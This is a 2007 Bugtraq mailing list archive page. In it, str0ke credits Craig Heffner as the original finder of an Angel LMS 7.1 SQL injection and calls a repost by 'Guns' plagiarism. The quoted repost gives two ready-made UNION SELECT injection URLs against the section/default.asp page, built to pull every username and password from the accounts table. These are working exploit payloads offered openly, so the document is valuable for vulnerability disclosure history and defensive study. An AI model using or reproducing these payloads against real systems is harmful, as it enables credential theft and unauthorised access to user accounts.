Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Angel LMS 7.1 - Remote SQL Injection

From: str0ke <str0ke () milw0rm com>
Date: Thu, 1 Mar 2007 11:33:12 -0600
# Credit:
#       Exploit discovered by Craig Heffner
#       heffnercj [at] gmail.com
#       http://www.craigheffner.com

http://www.milw0rm.com/exploits/3390

Plagiarism sucks.

/str0ke

On 1 Mar 2007 16:06:06 -0000, Guns () inbox com <Guns () inbox com> wrote:

# Angel LMS 7.1 Remote SQL Injection
# by Guns

#All User Accounts#
http://[Angel Root Directory]/section/default.asp?id='%20union%20select%20top%201%20username%20from%20accounts--"

#Account Passwords#
http://[Angel Root Directory]/section/default.asp?id='%20union%20select%20top%201%20password%20from%20accounts--"
Previous By Date Next
Previous By Thread Next

Current thread: